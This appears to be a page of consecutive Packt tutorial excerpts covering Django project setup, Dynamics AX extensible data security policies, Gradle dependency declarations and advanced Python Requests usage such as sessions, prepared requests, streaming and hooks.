Most important of all is Package Control, which is the manager for installing additional plugins directly from within Sublime. This will be the only package you install manually; it will take care of installing the rest of the packages for you from then on. Some recommendations for Python development using Sublime are as follows:

Sublime Linter: This gives instant feedback about the Python code as you write it. It also has PEP8 support; this plugin will highlight, in real time, the issues we discussed in the previous section about better coding so that you can fix them.

Sublime CodeIntel: This is maintained by the developer of SublimeLint. Sublime CodeIntel has some advanced functionalities, such as go-to definition, intelligent code completion, and import suggestions.

You can also explore other plugins for Sublime to increase your productivity.

Setting up the PyCharm IDE

You can use any of your favorite IDEs for Django project development. We will use the PyCharm IDE for this book. This IDE is recommended because it helps at debugging time, with breakpoints that will save you a lot of time in figuring out what actually went wrong. Here is how to install and set up PyCharm for Django:

Download and installation: You can check the features and download the PyCharm IDE from the following link: http://www.jetbrains.com/pycharm/

Setting up for Django: Setting up PyCharm for Django is very easy. You just have to import the project folder and give the manage.py path, as shown in the following figure:

The Django project structure

The Django project structure changed in the 1.6 release. Django (django-admin.py) also has a startapp command to create an application, so it is high time to tell you the difference between an application and a project in Django. A project is a complete website or application, whereas an application is a small, self-contained Django app. An application is based on the principle that it should do one thing and do it right. To ease the pain of building a Django project right from scratch, Django helps you by auto-generating the basic project structure files, from which any project can be taken forward for its development and feature addition. Thus, to conclude, we can say that a project is a collection of applications, and an application can be written as a separate entity and can be easily exported to other applications for reusability.

To create your first Django project, open a terminal (or Command Prompt for Windows users), type the following command, and hit Enter:

$ django-admin.py startproject django_mytweets

This command will make a folder named django_mytweets in the current directory and create the initial directory structure inside it. Let's see what kind of files are created. The new structure is as follows:

django_mytweets/
    django_mytweets/
    manage.py

This is the content of the inner django_mytweets/ folder:

django_mytweets/
    __init__.py
    settings.py
    urls.py
    wsgi.py

Here is a quick explanation of what these files are:

django_mytweets (the outer folder): This folder is the project folder. Contrary to the earlier project structure, in which the whole project was kept in a single folder, the new Django project structure somehow hints that every project is an application inside Django. This means that you can import other third-party applications on the same level as the Django project. 
This folder also contains the manage.py utility script, which is used for project management tasks.

manage.py: This utility script is used to manage our project. You can think of it as your project's version of django-admin.py. Actually, both django-admin.py and manage.py share the same backend code. Further clarification about the settings will be provided when we tweak them later. Let's have a look at the manage.py file:

#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_mytweets.settings")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)

The source code of the manage.py file will be self-explanatory once you read the following code explanation.

#!/usr/bin/env python

The first line is just a declaration that the file is a Python script, followed by the import section, in which the os and sys modules are imported. These modules mainly contain system-related operations.

import os
import sys

The next piece of code checks whether the file is being executed as the main program, and then points Django to the project's settings module by setting the DJANGO_SETTINGS_MODULE environment variable. As you are already running a virtual environment, this will set the path for all the modules to the path of the currently running virtual environment.

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE",
        "django_mytweets.settings")

django_mytweets/ (the inner folder)

__init__.py: Django projects are Python packages, and this file is required to tell Python that this folder is to be treated as a package. A package, in Python's terminology, is a collection of modules, and packages are used to group similar files together and prevent naming conflicts.

settings.py: This is the main configuration file for your Django project. In it, you can specify a variety of options, including database settings, site language(s), which Django features need to be enabled, and so on. By default, the database is configured to use SQLite, which is fine for testing purposes. Here, we will only see how to configure the database in the settings file; the file also contains the basic configuration, and with a slight modification to the manage.py file, it can be moved to another folder, such as config or conf.

To make every other third-party application a part of the project, we need to register it in the settings.py file. INSTALLED_APPS is the variable that contains all the entries for the installed applications. As the project grows, it becomes difficult to manage; therefore, the INSTALLED_APPS variable can be split into three logical partitions (a sketch of this layout follows at the end of this section), as follows:

DEFAULT_APPS: This partition contains the default Django installed applications (such as the admin)
THIRD_PARTY_APPS: This partition contains other applications, such as SocialAuth, which is used for social authentication
LOCAL_APPS: This partition contains the applications that are created by you

urls.py: This is another configuration file. You can think of it as a mapping between URLs and the Django view functions that handle them. This file is one of Django's more powerful features.

When we start writing code for our application, we will create new files inside the project's folder. So, the folder also serves as a container for our code. Now that you have a general idea of the structure of a Django project, let's configure our database system. 
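Before moving on to the database, here is the promised sketch of splitting INSTALLED_APPS into the three partitions described above. This is only a minimal illustration of settings.py: the social_auth and tweets entries are hypothetical app names used as placeholders, not packages that this project necessarily installs.

# settings.py (sketch) – partitioning INSTALLED_APPS for readability.
# The non-Django app names below are placeholders for illustration only.
DEFAULT_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
)

THIRD_PARTY_APPS = (
    'social_auth',   # hypothetical third-party app for social authentication
)

LOCAL_APPS = (
    'tweets',        # hypothetical app created by you
)

# Django only reads the combined INSTALLED_APPS setting,
# so the three partitions are simply concatenated here.
INSTALLED_APPS = DEFAULT_APPS + THIRD_PARTY_APPS + LOCAL_APPS

Keeping the partitions as separate tuples costs nothing at runtime, because Django only ever looks at the combined INSTALLED_APPS value.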
Summary We prepared our development environment in this article, created our first project, set up the database, and learned how to launch the Django development server. We learned the best way to write code for our Django project and saw the default Django project structure. Resources for Article: Further resources on this subject: Tinkering Around in Django JavaScript Integration [article] Adding a developer with Django forms [article] So, what is Django? [article]

Developing Extensible Data Security

Packt
17 Jun 2015
7 min read
This article is written by Ahmed Mohamed Rafik Moustafa, the author of Microsoft Dynamics AX 2012 R3 Security. In any corporation, some users are restricted from working with specific sensitive data because of its confidentiality or company policies, and this type of data access authorization can be managed using extensible data security (XDS). XDS is the evolution of the record-level security (RLS) that was available in the previous versions of Microsoft Dynamics AX. Microsoft also keeps RLS in AX 2012, so you can refer to it at any time. The topics that will be covered in this article are as follows:

The main concepts of XDS policies
Designing and developing the XDS policy
Creating the XDS policy
Adding constrained tables and views
Setting the XDS policy context
Debugging the XDS policy

(For more resources related to this topic, see here.)

The main concepts of XDS policies

When developing an XDS policy, you need to be familiar with the following concepts:

Constrained tables: A constrained table is the table or tables in a given security policy from which data is filtered or secured, based on the associated policy query.
Primary tables: A primary table is used to secure the content of the related constrained table.
Policy queries: A policy query is used to secure the constrained tables specified in a given extensible data security policy.
Policy context: A policy context is a piece of information that controls the circumstances under which a given policy is considered to be applicable. If this context is not set, then the policy, even if enabled, is not enforced.

After understanding these concepts, we move on to the four steps to develop an XDS policy, which are as follows:

Design the query on the primary tables.
Develop the policy.
Add the constrained tables and views.
Set up the policy context.

Designing and developing the XDS policy

XDS is a powerful mechanism that allows us to express and implement data security needs. The following steps show detailed instructions on designing and developing XDS:

Determine the primary table; for example, VendTable.
Create a query under the AOT Queries node:
    Use VendTable as the first data source
    Add other data sources as required by the vendor data model:

Creating the policy

Now we have to create the policy itself. Follow these steps:

Right-click on AOT and go to Security | Policies. Select New Security Policy.
Set the PrimaryTable property on the policy to VendTable.
Set the Query property on the policy to VendProfileAccountPolicy.
Set the PolicyGroup property to Vendor Self Service.
Set the ConstrainedTable property to Yes to secure the primary table using this policy.
Set the Enabled property to Yes or No, depending on whether or not you want the policy to be enforced.
Set the ContextType property to one of the following:
    ContextString: Set the property to this value if a global context is to be used with the policy. When ContextString is used, the context needs to be set by the application using the XDS::SetContext API.
    RoleName: Set the property to this value if the policy should be applied only when a user in a specific role accesses the constrained tables.
    RoleProperty: Set the property to this value if the policy is to be applied only when the user is a member of any one of the roles that have the ContextString property set to the same value. 
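When the ContextString option is used, the policy is only enforced after the application sets that context at runtime. The following is a minimal X++ sketch of what such a call might look like. It simply mirrors the XDSServices helper and the setXDSContext(1, '') / setXDSContext(2, '') pattern that appears in the debugging job later in this article, and it uses a hypothetical context value, 'VendorDataAccess'; both the numeric argument and this value are illustrative assumptions rather than a definitive implementation:

static void SetPolicyContextSketch(Args _args)
{
    XDSServices xdsServices = new XDSServices();

    // Assumed usage, mirroring the debugging job later in this article:
    // the second argument supplies the context string that policies with
    // a matching ContextString property check before they are enforced.
    xdsServices.setXDSContext(1, 'VendorDataAccess');
}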
The following screenshot displays the policy properties just described:

Adding constrained tables and views

After designing the query and developing the required policy, the next step is to add the constrained tables and views whose data is secured by the created policy. By following the next steps, you will be able to add constrained tables or views:

Right-click on the Constrained Tables node.
Go to New | Add table to add a constrained table; for example, the AssetBook table, as shown in the following screenshot:
When adding the constrained table AssetBook, you must determine the relationship that should be used to join the primary table with the new constrained table.
Go to New | Add View to add a constrained view to the selected policy.
Repeat these steps for every constrained table or view that needs to be secured through this policy.

After finishing these steps, the policy will be applied to all users who attempt to access the tables or views listed under the Constrained Tables node, as long as the Enabled property is set to Yes. Security policies are not applied to system administrators, that is, users in the SysAdmin role.

Setting the XDS policy context

According to the requirements, the security policy needs to be adjusted to apply only to the users who are assigned to the vendor roles. The following steps should be performed to make the appropriate adjustment:

Set the ContextType property on the policy node to RoleProperty.
Set the ContextString property on the policy node to ForAllVendorRoles:

To assign this policy to all the vendor roles, the ForAllVendorRoles context should be applied to the appropriate roles:

Locate each role that needs to be assigned to this policy on the AOT node; for example, the VendVendor role.
Set the ContextString property on the VendVendor role to ForAllVendorRoles:

For more information, go to MSDN and refer to Whitepapers – Developing Extensible Data Security Policies at https://msdn.microsoft.com/en-us/library/bb629286.aspx.

Debugging XDS policies

One of the most common issues reported when a new XDS policy is deployed is that an unexpected number of rows is returned from a given constrained table; for example, more sales orders than expected are returned if the sales order table is constrained by a given customer group. XDS provides a way to debug these errors: reviewing the SQL queries that have been generated. The X++ select statement has been extended with a command that instructs the underlying data access framework to generate the SQL query without actually executing it. The following job runs a select query on SalesTable with the generateonly command. It then calls the getSQLStatement() method on SalesTable and dumps the output using the info API:

static void VerifySalesQuery(Args _args)
{
    SalesTable salesTable;
    XDSServices xdsServices = new XDSServices();

    xdsServices.setXDSContext(1, '');

    // Only generate the SQL statement for the salesTable query
    select generateonly forceLiterals CustAccount, DeliveryDate from salesTable;

    // Print SQL statement to infolog
    info(salesTable.getSQLStatement());

    xdsServices.setXDSContext(2, '');
}

The XDS policy development framework further eases advanced debugging by storing the query in a human-readable form. 
This query and others on a given constrained table in a policy can be retrieved by using the following Transact-SQL query on the database in the development environment (AXDBDEV in this example): SELECT [PRIMARYTABLEAOTNAME], [QUERYOBJECTAOTNAME], [CONSTRAINEDTABLE], [MODELEDQUERYDEBUGINFO], [CONTEXTTYPE],[CONTEXTSTRING], [ISENABLED], [ISMODELED] FROM [AXDBDEV].[dbo].[ModelSecPolRuntimeEx] This SQL query generates the following output: As you can see, the query that will join the WHERE statement of any query to the AssetBook table will be ready for debugging. Other metadata, such as LayerId, can be debugged if needed. When multiple policies apply to a table, the results of the policies are linked together with AND operators. Summary By the end of this article, you are able to secure your sensitive data using the XDS features. We learned how to design and develop XDS policies, constrained tables and views, primary tables, policy queries, set the security context, run SQL queries and learned how to debug XDS policies. Resources for Article: Further resources on this subject: Understanding and Creating Simple SSRS Reports [article] Working with Data in Forms [article] Learning MS Dynamics AX 2012 Programming [article]

Defining Dependencies

Packt
16 Jun 2015
14 min read
In this article by Hubert Klein Ikkink, author of the book Gradle Dependency Management, you are going to learn how to define dependencies in your Gradle project. We will see how we can define the configurations of dependencies. You will learn about the different dependency types in Gradle and how to use them when you configure your build. When we develop software, we need to write code. Our code consists of packages with classes, and those can be dependent on the other classes and packages in our project. This is fine for one project, but we sometimes depend on classes in other projects we didn't develop ourselves; for example, we might want to use classes from an Apache Commons library, or we might be working on a project that is part of a bigger, multi-project application and we are dependent on classes in these other projects. Most of the time, when we write software, we want to use classes outside of our project. Actually, we have a dependency on those classes. Those dependent classes are mostly stored in archive files, such as Java Archive (JAR) files. Such archive files are identified by a unique version number, so we can have a dependency on the library with a specific version.

(For more resources related to this topic, see here.)

Declaring dependency configurations

In Gradle, we define dependency configurations to group dependencies together. A dependency configuration has a name and several properties, such as a description, and is actually a special type of FileCollection. Configurations can extend from each other, so we can build a hierarchy of configurations in our build files. Gradle plugins can also add new configurations to our project; for example, the Java plugin adds several new configurations, such as compile and testRuntime, to our project. The compile configuration is then used to define the dependencies that are needed to compile our source tree. The dependency configurations are defined with a configurations configuration block. Inside the block, we can define new configurations for our build. All configurations are added to the project's ConfigurationContainer object.

In the following example build file, we define two new configurations, where the traffic configuration extends from the vehicles configuration. This means that any dependency added to the vehicles configuration is also available in the traffic configuration. We can also assign a description property to our configuration to provide some more information about the configuration for documentation purposes. The following code shows this:

// Define new configurations for build.
configurations {
    // Define configuration vehicles.
    vehicles {
        description = 'Contains vehicle dependencies'
    }
    traffic {
        extendsFrom vehicles
        description = 'Contains traffic dependencies'
    }
}

To see which configurations are available in a project, we can execute the dependencies task. This task is available for each Gradle project. The task outputs all the configurations and dependencies of a project. Let's run this task for our current project and check the output:

$ gradle -q dependencies
------------------------------------------------------------
Root project
------------------------------------------------------------
traffic - Contains traffic dependencies
No dependencies
vehicles - Contains vehicle dependencies
No dependencies

Note that we can see our two configurations, traffic and vehicles, in the output. We have not defined any dependencies to these configurations, as shown in the output. 
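Because a configuration is a special type of FileCollection, we can already do something useful with it before any plugins or dependencies come into play. The following task is a minimal sketch (the task name printVehicles is an arbitrary choice, not part of the book's example) that resolves the vehicles configuration and prints the names of the files it contains; with the empty configurations defined above, it simply prints nothing:

// Sketch: using a configuration as a FileCollection.
// Any dependencies added to the vehicles configuration later
// will show up in the output of this task.
task printVehicles {
    doLast {
        configurations.vehicles.files.each { file ->
            println file.name
        }
    }
}

Running gradle -q printVehicles against the build file above produces no output for now, because the configuration is still empty.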
The Java plugin adds a couple of configurations to a project, which are used by the tasks from the Java plugin. Let's add the Java plugin to our Gradle build file: apply plugin: 'java' To see which configurations are added, we invoke the dependencies task and look at the output: $ gradle -q dependencies------------------------------------------------------------Root project------------------------------------------------------------archives - Configuration for archive artifacts.No dependenciescompile - Compile classpath for source set 'main'.No dependenciesdefault - Configuration for default artifacts.No dependenciesruntime - Runtime classpath for source set 'main'.No dependenciestestCompile - Compile classpath for source set 'test'.No dependenciestestRuntime - Runtime classpath for source set 'test'.No dependencies We see six configurations in our project just by adding the Java plugin. The archives configuration is used to group the artifacts our project creates. The other configurations are used to group the dependencies for our project. In the following table, the dependency configurations are summarized: Name Extends Description compile none These are dependencies to compile. runtime compile These are runtime dependencies. testCompile compile These are extra dependencies to compile tests. testRuntime runtime, testCompile These are extra dependencies to run tests. default runtime These are dependencies used by this project and artifacts created by this project. Declaring dependencies We defined configurations or applied a plugin that added new configurations to our project. However, a configuration is empty unless we add dependencies to the configuration. To declare dependencies in our Gradle build file, we must add the dependencies configuration block. The configuration block will contain the definition of our dependencies. In the following example Gradle build file, we define the dependencies block: // Dependencies configuration block.dependencies {// Here we define our dependencies.} Inside the configuration block, we use the name of a dependency configuration followed by the description of our dependencies. The name of the dependency configuration can be defined explicitly in the build file or can be added by a plugin we use. In Gradle, we can define several types of dependencies. In the following table, we will see the different types we can use: Dependency type Description External module dependency This is a dependency on an external module or library that is probably stored in a repository. Client module dependency This is a dependency on an external module where the artifacts are stored in a repository, but the meta information about the module is in the build file. We can override meta information using this type of dependency. Project dependency This is a dependency on another Gradle project in the same build. File dependency This is a dependency on a collection of files on the local computer. Gradle API dependency This is a dependency on the Gradle API of the current Gradle version. We use this dependency when we develop Gradle plugins and tasks. Local Groovy dependency This is a dependency on the Groovy libraries used by the current Gradle version. We use this dependency when we develop Gradle plugins and tasks. External module dependencies External module dependencies are the most common dependencies in projects. These dependencies refer to a module in an external repository. 
Later in the article, we will find out more about repositories, but basically, a repository stores modules in a central location. A module contains one or more artifacts and meta information, such as references to the other modules it depends on. We can use two notations to define an external module dependency in Gradle. We can use a string notation or a map notation. With the map notation, we can use all the properties available for a dependency. The string notation allows us to set a subset of the properties but with a very concise syntax. In the following example Gradle build file, we define several dependencies using the string notation: // Define dependencies.dependencies {// Defining two dependencies.vehicles 'com.vehicles:car:1.0', 'com.vehicles:truck:2.0'// Single dependency.traffic 'com.traffic:pedestrian:1.0'} The string notation has the following format: moduleGroup:moduleName:version. Before the first colon, the module group name is used, followed by the module name, and the version is mentioned last. If we use the map notation, we use the names of the attributes explicitly and set the value for each attribute. Let's rewrite our previous example build file and use the map notation: // Compact definition of configurations.configurations {vehiclestraffic.extendsFrom vehicles}// Define dependencies.dependencies {// Defining two dependencies.vehicles([group: 'com.vehicles', name: 'car', version: '1.0'],[group: 'com.vehicles', name: 'truck', version: '2.0'],)// Single dependency.traffic group: 'com.traffic', name: 'pedestrian', version:'1.0'} We can specify extra configuration attributes with the map notation, or we can add an extra configuration closure. One of the attributes of an external module dependency is the transitiveattribute. In the next example build file, we will set this attribute using the map notation and a configuration closure: dependencies {// Use transitive attribute in map notation.vehicles group: 'com.vehicles', name: 'car',version: '1.0', transitive: false// Combine map notation with configuration closure.vehicles(group: 'com.vehicles', name: 'car', version: '1.0') {transitive = true}// Combine string notation with configuration closure.traffic('com.traffic:pedestrian:1.0') {transitive = false}} Once of the advantages of Gradle is that we can write Groovy code in our build file. This means that we can define methods and variables and use them in other parts of our Gradle file. This way, we can even apply refactoring to our build file and make maintainable build scripts. Note that in our examples, we included multiple dependencies with the com.vehicles group name. The value is defined twice, but we can also create a new variable with the group name and reference of the variable in the dependencies configuration. We define a variable in our build file inside an ext configuration block. We use the ext block in Gradle to add extra properties to an object, such as our project. The following sample code defines an extra variable to hold the group name: // Define project property with// dependency group name 'com.vehicles'ext {groupNameVehicles = 'com.vehicles'}dependencies {// Using Groovy string support with// variable substition.vehicles "$groupNameVehicles:car:1.0"// Using map notation and reference// property groupNameVehicles.vehicles group: groupNameVehicles, name: 'truck', version:'2.0'} If we define an external module dependency, then Gradle tries to find a module descriptor in a repository. 
If the module descriptor is available, it is parsed to see which artifacts need to be downloaded. Also, if the module descriptor contains information about the dependencies needed by the module, those dependencies are downloaded as well. Sometimes, a dependency has no descriptor in the repository, and it is only then that Gradle downloads the artifact for that dependency. A dependency based on a Maven module only contains one artifact, so it is easy for Gradle to know which artifact to download. But for a Gradle or Ivy module, it is not so obvious, because a module can contain multiple artifacts. The module will have multiple configurations, each with different artifacts. Gradle will use the configuration with the name default for such modules. So, any artifacts and dependencies associated with the default configuration are downloaded. However, it is possible that the default configuration doesn't contain the artifacts we need. We, therefore, can specify the configuration attribute for the dependency configuration to specify a specific configuration that we need. The following example defines a configuration attribute for the dependency configuration: dependencies {// Use the 'jar' configuration defined in the// module descriptor for this dependency.traffic group: 'com.traffic',name: 'pedestrian',version: '1.0',configuration: 'jar'} When there is no module descriptor for a dependency, only the artifact is downloaded by Gradle. We can use an artifact-only notation if we only want to download the artifact for a module with a descriptor and not any dependencies. Or, if we want to download another archive file, such as a TAR file, with documentation, from a repository. To use the artifact-only notation, we must add the file extension to the dependency definition. If we use the string notation, we must add the extension prefixed with an @ sign after the version. With the map notation, we can use the ext attribute to set the extension. If we define our dependency as artifact-only, Gradle will not check whether there is a module descriptor available for the dependency. In the next build file, we will see examples of the different artifact-only notations: dependencies {// Using the @ext notation to specify// we only want the artifact for this// dependency.vehicles 'com.vehicles:car:2.0@jar'// Use map notation with ext attribute// to specify artifact only dependency.traffic group: 'com.traffic', name: 'pedestrian',version: '1.0', ext: 'jar'// Alternatively we can use the configuration closure.// We need to specify an artifact configuration closure// as well to define the ext attribute.vehicles('com.vehicles:car:2.0') {artifact {name = 'car-docs'type = 'tar'extension = 'tar'}}} A Maven module descriptor can use classifiers for the artifact. This is mostly used when a library with the same code is compiled for different Java versions, for example, a library is compiled for Java 5 and Java 6 with the jdk15 and jdk16 classifiers. We can use the classifier attribute when we define an external module dependency to specify which classifier we want to use. Also, we can use it in a string or map notation. With the string notation, we add an extra colon after the version attribute and specify the classifier. For the map notation, we can add the classifier attribute and specify the value we want. 
The following build file contains an example of the different definitions of a dependency with a classifier: dependencies {// Using string notation we can// append the classifier after// the version attribute, prefixed// with a colon.vehicles 'com.vehicles:car:2.0:jdk15'// With the map notation we simply use the// classifier attribute name and the value.traffic group: 'com.traffic', name: 'pedestrian',version: '1.0', classifier: 'jdk16'// Alternatively we can use the configuration closure.// We need to specify an artifact configuration closure// as well to define the classifier attribute.vehicles('com.vehicles:truck:2.0') {artifact {name = 'truck'type = 'jar'classifier = 'jdk15'}}} Defining client module dependencies When we define external module dependencies, we expect that there is a module descriptor file with information about the artifacts and dependencies for those artifacts. Gradle will parse this file and determine what needs to be downloaded. Remember that if such a file is not available on the artifact, it will be downloaded. However, what if we want to override the module descriptor or provide one if it is not available? In the module descriptor that we provide, we can define the dependencies of the module ourselves. We can do this in Gradle with client module dependencies. Instead of relying on a module descriptor in a repository, we define our own module descriptor locally in the build file. We now have full control over what we think the module should look like and which dependencies the module itself has. We use the module method to define a client module dependency for a dependency configuration. In the following example build file, we will write a client module dependency for the dependency car, and we will add a transitive dependency to the driver: dependencies {// We use the module method to instruct// Gradle to not look for the module descriptor// in a repository, but use the one we have// defined in the build file.vehicles module('com.vehicles:car:2.0') {// Car depends on driver.dependency('com.traffic:driver:1.0')}} Using project dependencies Projects can be part of a bigger, multi-project build, and the projects can be dependent on each other, for example, one project can be made dependent on the generated artifact of another project, including the transitive dependencies of the other project. To define such a dependency, we use the project method in our dependencies configuration block. We specify the name of the project as an argument. We can also define the name of a dependency configuration of the other project we depend on. By default, Gradle will look for the default dependency configuration, but with the configuration attribute, we can specify a specific dependency configuration to be used. The next example build file will define project dependencies on the car and truck projects: dependencies {// Use project method to define project// dependency on car project.vehicles project(':car')// Define project dependency on truck// and use dependency configuration api// from that project.vehicles project(':truck') {configuration = 'api'}// We can use alternative syntax// to specify a configuration.traffic project(path: ':pedestrian',configuration: 'lib')} Summary In this article, you learned how to create and use dependency configurations to group together dependencies. We saw how to define several types of dependencies, such as external module dependency and internal dependencies. 
Also, we saw how we can add dependencies to code in Gradle build scripts with the classpath configuration and the buildscript configuration. Finally, we looked at some maintainable ways of defining dependencies using code refactoring and the external dependency management plugin. Resources for Article: Further resources on this subject: Dependency Management in SBT [Article] Apache Maven and m2eclipse [Article] AngularJS Web Application Development Cookbook [Article]

Digging Deep into Requests

Packt
16 Jun 2015
17 min read
In this article by Rakesh Vidya Chandra and Bala Subrahmanyam Varanasi, authors of the book Python Requests Essentials, we are going to deal with advanced topics in the Requests module. There are many more features in the Requests module that makes the interaction with the web a cakewalk. Let us get to know more about different ways to use Requests module which helps us to understand the ease of using it. (For more resources related to this topic, see here.) In a nutshell, we will cover the following topics: Persisting parameters across requests using Session objects Revealing the structure of request and response Using prepared requests Verifying SSL certificate with Requests Body Content Workflow Using generator for sending chunk encoded requests Getting the request method arguments with event hooks Iterating over streaming API Self-describing the APIs with link headers Transport Adapter Persisting parameters across Requests using Session objects The Requests module contains a session object, which has the capability to persist settings across the requests. Using this session object, we can persist cookies, we can create prepared requests, we can use the keep-alive feature and do many more things. The Session object contains all the methods of Requests API such as GET, POST, PUT, DELETE and so on. Before using all the capabilities of the Session object, let us get to know how to use sessions and persist cookies across requests. Let us use the session method to get the resource. >>> import requests >>> session = requests.Session() >>> response = requests.get("https://google.co.in", cookies={"new-cookie-identifier": "1234abcd"}) In the preceding example, we created a session object with requests and its get method is used to access a web resource. The cookie value which we had set in the previous example will be accessible using response.request.headers. >>> response.request.headers CaseInsensitiveDict({'Cookie': 'new-cookie-identifier=1234abcd', 'Accept-Encoding': 'gzip, deflate, compress', 'Accept': '*/*', 'User-Agent': 'python-requests/2.2.1 CPython/2.7.5+ Linux/3.13.0-43-generic'}) >>> response.request.headers['Cookie'] 'new-cookie-identifier=1234abcd' With session object, we can specify some default values of the properties, which needs to be sent to the server using GET, POST, PUT and so on. We can achieve this by specifying the values to the properties like headers, auth and so on, on a Session object. >>> session.params = {"key1": "value", "key2": "value2"} >>> session.auth = ('username', 'password') >>> session.headers.update({'foo': 'bar'}) In the preceding example, we have set some default values to the properties—params, auth, and headers using the session object. We can override them in the subsequent request, as shown in the following example, if we want to: >>> session.get('http://mysite.com/new/url', headers={'foo': 'new-bar'}) Revealing the structure of request and response A Requests object is the one which is created by the user when he/she tries to interact with a web resource. It will be sent as a prepared request to the server and does contain some parameters which are optional. Let us have an eagle eye view on the parameters: Method: This is the HTTP method to be used to interact with the web service. For example: GET, POST, PUT. URL: The web address to which the request needs to be sent. headers: A dictionary of headers to be sent in the request. files: This can be used while dealing with the multipart upload. 
It's the dictionary of files, with key as file name and value as file object. data: This is the body to be attached to the request.json. There are two cases that come in to the picture here: If json is provided, content-type in the header is changed to application/json and at this point, json acts as a body to the request. In the second case, if both json and data are provided together, data is silently ignored. params: A dictionary of URL parameters to append to the URL. auth: This is used when we need to specify the authentication to the request. It's a tuple containing username and password. cookies: A dictionary or a cookie jar of cookies which can be added to the request. hooks: A dictionary of callback hooks. A Response object contains the response of the server to a HTTP request. It is generated once Requests gets a response back from the server. It contains all of the information returned by the server and also stores the Request object we created originally. Whenever we make a call to a server using the requests, two major transactions are taking place in this context which are listed as follows: We are constructing a Request object which will be sent out to the server to request a resource A Response object is generated by the requests module Now, let us look at an example of getting a resource from Python's official site. >>> response = requests.get('https://python.org') In the preceding line of code, a requests object gets constructed and will be sent to 'https://python.org'. Thus obtained Requests object will be stored in the response.request variable. We can access the headers of the Request object which was sent off to the server in the following way: >>> response.request.headers CaseInsensitiveDict({'Accept-Encoding': 'gzip, deflate, compress', 'Accept': '*/*', 'User-Agent': 'python-requests/2.2.1 CPython/2.7.5+ Linux/3.13.0-43-generic'}) The headers returned by the server can be accessed with its 'headers' attribute as shown in the following example: >>> response.headers CaseInsensitiveDict({'content-length': '45950', 'via': '1.1 varnish', 'x-cache': 'HIT', 'accept-ranges': 'bytes', 'strict-transport-security': 'max-age=63072000; includeSubDomains', 'vary': 'Cookie', 'server': 'nginx', 'age': '557','content-type': 'text/html; charset=utf-8', 'public-key-pins': 'max-age=600; includeSubDomains; ..) The response object contains different attributes like _content, status_code, headers, url, history, encoding, reason, cookies, elapsed, request. >>> response.status_code 200 >>> response.url u'https://www.python.org/' >>> response.elapsed datetime.timedelta(0, 1, 904954) >>> response.reason 'OK' Using prepared Requests Every request we send to the server turns to be a PreparedRequest by default. The request attribute of the Response object which is received from an API call or a session call is actually the PreparedRequest that was used. There might be cases in which we ought to send a request which would incur an extra step of adding a different parameter. Parameters can be cookies, files, auth, timeout and so on. We can handle this extra step efficiently by using the combination of sessions and prepared requests. Let us look at an example: >>> from requests import Request, Session >>> header = {} >>> request = Request('get', 'some_url', headers=header) We are trying to send a get request with a header in the previous example. Now, take an instance where we are planning to send the request with the same method, URL, and headers, but we want to add some more parameters to it. 
In this condition, we can use the session method to receive complete session level state to access the parameters of the initial sent request. This can be done by using the session object. >>> from requests import Request, Session >>> session = Session() >>> request1 = Request('GET', 'some_url', headers=header) Now, let us prepare a request using the session object to get the values of the session level state: >>> prepare = session.prepare_request(request1) We can send the request object request with more parameters now, as follows: >>> response = session.send(prepare, stream=True, verify=True) 200 Voila! Huge time saving! The prepare method prepares the complete request with the supplied parameters. In the previous example, the prepare_request method was used. There are also some other methods like prepare_auth, prepare_body, prepare_cookies, prepare_headers, prepare_hooks, prepare_method, prepare_url which are used to create individual properties. Verifying an SSL certificate with Requests Requests provides the facility to verify an SSL certificate for HTTPS requests. We can use the verify argument to check whether the host's SSL certificate is verified or not. Let us consider a website which has got no SSL certificate. We shall send a GET request with the argument verify to it. The syntax to send the request is as follows: requests.get('no ssl certificate site', verify=True) As the website doesn't have an SSL certificate, it will result an error similar to the following: requests.exceptions.ConnectionError: ('Connection aborted.', error(111, 'Connection refused')) Let us verify the SSL certificate for a website which is certified. Consider the following example: >>> requests.get('https://python.org', verify=True) <Response [200]> In the preceding example, the result was 200, as the mentioned website is SSL certified one. If we do not want to verify the SSL certificate with a request, then we can put the argument verify=False. By default, the value of verify will turn to True. Body content workflow Take an instance where a continuous stream of data is being downloaded when we make a request. In this situation, the client has to listen to the server continuously until it receives the complete data. Consider the case of accessing the content from the response first and the worry about the body next. In the above two situations, we can use the parameter stream. Let us look at an example: >>> requests.get("https://pypi.python.org/packages/source/F/Flask/Flask-0.10.1.tar.gz", stream=True) If we make a request with the parameter stream=True, the connection remains open and only the headers of the response will be downloaded. This gives us the capability to fetch the content whenever we need by specifying the conditions like the number of bytes of data. The syntax is as follows: if int(request.headers['content_length']) < TOO_LONG: content = r.content By setting the parameter stream=True and by accessing the response as a file-like object that is response.raw, if we use the method iter_content, we can iterate over response.data. This will avoid reading of larger responses at once. The syntax is as follows: iter_content(chunk_size=size in bytes, decode_unicode=False) In the same way, we can iterate through the content using iter_lines method which will iterate over the response data one line at a time. 
The syntax is as follows: iter_lines(chunk_size = size in bytes, decode_unicode=None, delimitter=None) The important thing that should be noted while using the stream parameter is it doesn't release the connection when it is set as True, unless all the data is consumed or response.close is executed. Keep-alive facility As the urllib3 supports the reuse of the same socket connection for multiple requests, we can send many requests with one socket and receive the responses using the keep-alive feature in the Requests library. Within a session, it turns to be automatic. Every request made within a session automatically uses the appropriate connection by default. The connection that is being used will be released after all the data from the body is read. Streaming uploads A file-like object which is of massive size can be streamed and uploaded using the Requests library. All we need to do is to supply the contents of the stream as a value to the data attribute in the request call as shown in the following lines. The syntax is as follows: with open('massive-body', 'rb') as file:    requests.post('http://example.com/some/stream/url',                  data=file) Using generator for sending chunk encoded Requests Chunked transfer encoding is a mechanism for transferring data in an HTTP request. With this mechanism, the data is sent in a series of chunks. Requests supports chunked transfer encoding, for both outgoing and incoming requests. In order to send a chunk encoded request, we need to supply a generator for your body. The usage is shown in the following example: >>> def generator(): ...     yield "Hello " ...     yield "World!" ... >>> requests.post('http://example.com/some/chunked/url/path',                  data=generator()) Getting the request method arguments with event hooks We can alter the portions of the request process signal event handling using hooks. For example, there is hook named response which contains the response generated from a request. It is a dictionary which can be passed as a parameter to the request. The syntax is as follows: hooks = {hook_name: callback_function, … } The callback_function parameter may or may not return a value. When it returns a value, it is assumed that it is to replace the data that was passed 